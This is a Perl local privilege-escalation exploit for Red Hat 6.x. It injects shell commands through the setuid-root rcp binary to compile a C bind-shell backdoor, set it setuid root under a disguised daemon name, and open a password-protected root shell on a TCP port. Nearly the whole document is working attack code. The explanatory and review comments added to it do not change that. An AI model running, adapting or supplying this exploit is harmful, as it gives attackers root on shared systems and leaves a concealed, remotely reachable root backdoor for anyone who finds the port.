
Linux Red Hat 6.x rcp local root exploit (shell-metacharacter injection through the setuid-root rcp binary; the injected commands compile and setuid a password-protected bind shell)

#!/usr/bin/perl -w
####################
#RedHat6.* rcp local root xsploit.
#Opens password-protected rootshell on any port.
#Tested on RH6.1-2.
#
#Thnx to:
#Andrew Griffiths for this bug
#tlabs for rcpsploit.pl
#p0is0n.net for mutagen.c
#
#Config:
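use strict;
use warnings;

# --- Config ---------------------------------------------------------------
# Settings read by the rest of the script.  Declared with `my` at file scope
# so they stay visible to the code below while strictures are on.
my $passwd  = "dhgroup.org";   # password the spawned root shell will demand
my $port    = 8000;            # TCP port the root shell listens on
my $RCPFILE = "/usr/bin/rcp";  # the setuid rcp binary to abuse
# Locate it with: ls -alF `which rcp`

# Precondition: rcp must be setuid *and* owned by root.  A setuid bit on a
# binary owned by anyone else would pass the original `-u` test, yet the
# commands rcp runs for us would never reach uid 0 and the script would end
# with a misleading success banner.  Exit non-zero on failure (the original
# exited 0) so callers/scripts can tell the two outcomes apart.
my $owner = (stat $RCPFILE)[4];   # undef if the path does not exist
unless ( -u _ && defined $owner && $owner == 0 ) {
	print "rcp is not suid, quiting\n";
	exit(1);
}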

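# Drop the backdoor source into /tmp.  The path is fixed because the rcp
# payloads below compile it from exactly this location.  Create it with
# O_EXCL so we never append to -- or follow a symlink planted at -- a file
# another local user left at this well-known name.  The original opened it
# with ">>", which would silently have produced an uncompilable file (or
# written into someone else's) if /tmp/mutagen.c already existed.
use Fcntl qw(O_WRONLY O_CREAT O_EXCL);
my $src_path = "/tmp/mutagen.c";
sysopen(my $src, $src_path, O_WRONLY | O_CREAT | O_EXCL, 0600)
	or die "Can't creat file $src_path: $!";

# mutagen.c: a forking TCP bind shell.  It calls setuid(0)/setgid(0) (it is
# presumably made setuid-root by the rcp-injected `chmod +s` later on), binds
# INADDR_ANY:argv[1], zeroes its argv, daemonizes, and for each client reads
# one line and exec's /bin/sh if it equals argv[2].  Reviewer notes on the C
# (kept verbatim here, this script only wraps it):
#  - the password check is a plaintext strcmp over an unauthenticated,
#    unencrypted socket reachable from any interface; it is trivially
#    brute-forceable and anyone who finds the port gets root;
#  - read() may return 0 (client disconnects at once), in which case
#    ipasswd[strlen(ipasswd)-1] indexes ipasswd[-1];
#  - a full 32-byte read leaves ipasswd with no NUL terminator, so the
#    following strlen() walks off the end of the buffer; the same applies to
#    passwd when argv[2] is 32 bytes or longer (strncpy does not terminate).
print {$src} <<"EOF" or die "Can't write $src_path: $!";
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<unistd.h>
#include<signal.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

void sigchild(int sig)
{
    wait(NULL);
}
int main(int argc, char **argv)
{
	setuid(0);
	setgid(0);
	struct sigaction siga;
	struct sockaddr_in sin;
	int sock, s, len;
	char passwd[32], ipasswd[32];
	char goaway[] = "go away!\\r\\n";

	if( argc != 3) {
		printf("Usage: %s <port> <passwd>\\n", argv[0]);
		return 0;
	}
	strncpy(passwd, argv[2], sizeof(passwd));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = INADDR_ANY;
	sin.sin_port = htons(atoi(argv[1]));
	sock = socket(PF_INET, SOCK_STREAM, 0);
	if(bind(sock, (struct sockaddr*)&sin, sizeof(sin)) == -1) {
	    perror("bind()");
	    return 0;
	}
	listen(sock, SOMAXCONN);
	bzero(argv[2], strlen(argv[2]));
	bzero(argv[1], strlen(argv[1]));
	bzero(&siga, sizeof(siga));
	siga.sa_handler = sigchild;
	siga.sa_flags = SA_NOCLDSTOP | SA_RESTART;
	sigaction(SIGCHLD, &siga, NULL);
	daemon(0, 0);
	while(1) {
	    len = sizeof(sin);
	    s = accept(sock, (struct sockaddr*)&sin, &len);
	    if(fork()) close(s); else
	    {
		    close(sock);
	            close(0);dup(s);
		    close(1);dup(s);
		    close(2);dup(s);
		    close(s);
		    bzero(ipasswd, sizeof(ipasswd));
		    read(0, ipasswd, sizeof(ipasswd));
		    if(ipasswd[strlen(ipasswd)-1] == '\\n')
					ipasswd[strlen(ipasswd)-1] = 0;
		    if(!strcmp(passwd, ipasswd))execl("/bin/sh", "-sh", NULL);
		    write(2, goaway, strlen(goaway));
		    _exit(0);
	    }
	}
}
EOF
close($src) or die "Can't close $src_path: $!";   # buffered write errors surface here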
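# The bug being abused: for a local-to-local copy, rcp appears to hand its
# arguments to a shell without quoting, and on this build it does so while
# still holding root privileges -- so everything after the first ';' in the
# "source" argument runs as root.  The dummy file "hey" only exists so the
# leading `cp hey fucker` has something to copy; "fucker" is its copy.
my $tmp_bin = "/tmp/rpc.mountd";   # name chosen to blend in with rpc daemons
my $tmp_src = "/tmp/mutagen.c";    # written earlier in this script

open(my $dummy, '>', 'hey') or die "Can't create file: $!";
print {$dummy} "10x 2 tlabs for their xsploit, to Andrew Griffiths for the bug report and to p0is0n for mutagen.c :)";
close($dummy) or die "Can't close file: $!";

# Invoke the configured binary rather than whatever `rcp` is first on PATH,
# so the setuid check at the top and the binary actually executed agree.
# rcp's own exit status is not meaningful here (the trailing 'localhost' is
# presumably executed as a command and fails), so success is verified by
# inspecting the result afterwards instead of by checking system().
for my $injected ("gcc -o $tmp_bin $tmp_src", "chmod +s $tmp_bin") {
	system "$RCPFILE 'hey fucker; $injected;' localhost 2> /dev/null";
}

# Best-effort cleanup of the helper files; nothing below depends on it.
unlink($tmp_src, "hey", "fucker");

# Only claim success if the injected commands actually produced a setuid-root
# binary.  The original printed the banner unconditionally, even when gcc or
# chmod had failed.
my @bin_stat = stat $tmp_bin;
unless ( @bin_stat && -u _ && $bin_stat[4] == 0 ) {
	die "$tmp_bin was not created setuid root; the rcp injection failed\n";
}

# List-form system(): port and password never pass through a shell, so a
# password containing quotes or metacharacters cannot break (or alter) the
# command.  The daemon zeroes its argv after parsing, but the password is
# still briefly visible in the process list.
system($tmp_bin, $port, $passwd) == 0
	or die "Failed to start $tmp_bin: $?\n";

# NOTE: this leaves $tmp_bin setuid root on the host; remove it when done.
printf "Now, rootshell on port '$port' with password '$passwd' must be opened.\n Have a nice day :)";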
